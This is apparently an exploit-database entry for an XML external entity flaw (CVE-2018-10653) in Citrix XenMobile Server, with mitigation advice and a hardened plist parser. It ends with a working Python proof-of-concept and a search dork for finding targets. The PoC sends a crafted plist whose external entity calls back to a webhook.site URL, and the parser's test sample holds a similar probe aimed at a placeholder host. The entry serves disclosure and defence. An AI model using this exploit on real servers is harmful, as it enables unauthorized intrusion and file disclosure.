Vendor: XenMobile Server
By: Jonas Lejon
CVSS: 9.8 (CRITICAL)
CWE: 611 (XML External Entity Injection)
Product Name: XenMobile Server
Affected Version From: XenMobile Server 10.8 before RP2 and 10.7 before RP3
Affected Version To:
Patch Exists: YES
CVE: CVE-2018-10653
CPE: a:citrix:xenmobile_server:10.8
Metasploit:
Other Scripts:
Platforms Tested: XenMobile
Year: 2019

Citrix XenMobile Server 10.8 – XML External Entity Injection

This entry describes an XML external entity (XXE) injection in Citrix XenMobile Server. The server parses attacker-supplied XML with external entity resolution enabled, so a specially crafted XML payload can make it resolve entities of the attacker's choosing, potentially disclosing internal files or causing a denial of service. The vulnerability exists in XenMobile Server 10.8 before RP2 and 10.7 before RP3.

Mitigation:

Citrix released a patch in May 2018 to address this vulnerability. Users are advised to update to XenMobile Server 10.8 RP2 or 10.7 RP3 or later versions to mitigate this vulnerability.
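The root cause is an XML parser that honours DTD entity declarations in the Apple MDM plist sent to the `/zdm/ios/mdm` endpoint. As an added example (not code from the Exploit-DB entry or from Citrix), the hardened parser below keeps the legitimate Apple plist DOCTYPE but refuses any internal DTD subset, entity declaration or external entity, so a document shaped like the PoC further down is rejected before anything is resolved. The function names, the sample messages and the `attacker.invalid` host are all assumptions made for this illustration.

```python
import plistlib
from xml.parsers import expat


class UnsafePlistError(ValueError):
    """Raised when the XML carries DTD constructs an MDM plist never needs."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    # Apple's plist DOCTYPE names "plist" and never has an internal subset;
    # the PoC's "<!DOCTYPE plist [<!ENTITY % ... >" fails this check.
    if name != "plist" or has_internal_subset:
        raise UnsafePlistError("unexpected DOCTYPE %r (internal subset: %s)"
                               % (name, bool(has_internal_subset)))


def _reject_entity(name, is_param, value, base, sysid, pubid, notation):
    raise UnsafePlistError("entity declaration %r not allowed" % name)


def _reject_external(context, base, sysid, pubid):
    raise UnsafePlistError("external entity %r not allowed" % sysid)


def parse_mdm_plist(data: bytes) -> dict:
    """Screen the XML with a locked-down expat parser, then load it."""
    p = expat.ParserCreate()
    # Never expand parameter entities, so an external DTD is never fetched.
    p.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)
    p.StartDoctypeDeclHandler = _reject_doctype
    p.EntityDeclHandler = _reject_entity
    p.ExternalEntityRefHandler = _reject_external
    p.Parse(data, True)  # raises UnsafePlistError or expat.ExpatError
    return plistlib.loads(data)


# Constructed samples: a benign MDM message and an XXE probe shaped like the
# PoC (the host attacker.invalid is a placeholder; nothing is contacted).
BENIGN = (b'<?xml version="1.0" encoding="UTF-8"?>\n'
          b'<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" '
          b'"http://www.apple.com/DTDs/PropertyList-1.0.dtd">\n'
          b'<plist version="1.0"><dict><key>MessageType</key>'
          b'<string>TokenUpdate</string></dict></plist>')
XXE = (b'<?xml version="1.0" encoding="UTF-8" standalone=\'no\'?>'
       b'<!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM '
       b'"http://attacker.invalid/test.dtd">%j00t9; ]>'
       b'<plist version="1.0"><dict/></plist>')


def is_rejected(data: bytes) -> bool:
    try:
        parse_mdm_plist(data)
    except (UnsafePlistError, expat.ExpatError):
        return True
    return False
```

The same check applies to any XML-based endpoint: reject the DTD constructs the format never uses instead of trusting the parser's defaults.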

Exploit-DB raw data:

# Exploit Title: Citrix XenMobile Server 10.8 - XML External Entity Injection
# Google Dork: inurl:zdm logon
# Date: 2019-11-28
# Exploit Author: Jonas Lejon
# Vendor Homepage: https://www.citrix.com
# Software Link:
# Version: XenMobile Server 10.8 before RP2 and 10.7 before RP3
# Tested on: XenMobile
# CVE : CVE-2018-10653

#!/usr/bin/python3
##
## PoC exploit test for the security vulnerability CVE-2018-10653 in
## XenMobile Server 10.8 before RP2 and 10.7 before RP3
##
## This PoC was written by Jonas Lejon 2019-11-28
## <jonas.xenmobile@triop.se> https://triop.se
## Reported to Citrix 2017-10, patch released 2018-05
##

import requests
import sys
from pprint import pprint
import uuid

# Surf to https://webhook.site and copy/paste the URL below. Used for
# XXE callback
WEBHOOK = "https://webhook.site/310d8cd9-ebd3-xxx-xxxx-xxxxxx/"

if len(sys.argv) != 2:
    sys.exit("usage: %s <base URL of the XenMobile server>" % sys.argv[0])

# Unique id so the webhook callback can be matched to this run
callback_id = str(uuid.uuid1())

# Plist with an external parameter entity pointing at the webhook
xml = ('''<?xml version="1.0" encoding="UTF-8" standalone='no'?><!DOCTYPE plist [<!ENTITY % j00t9 SYSTEM "'''
       + WEBHOOK + callback_id + '''/test.dtd">%j00t9; ]>''')

print(callback_id)

response = requests.put(sys.argv[1] + '/zdm/ios/mdm', verify=False,
                        headers={'User-Agent': 'MDM/1.0',
                                 'Connection': 'close',
                                 'Content-Type': 'application/x-apple-aspen-mdm'},
                        data=xml, stream=True)
print(response.content)
print(response.text)
pprint(response)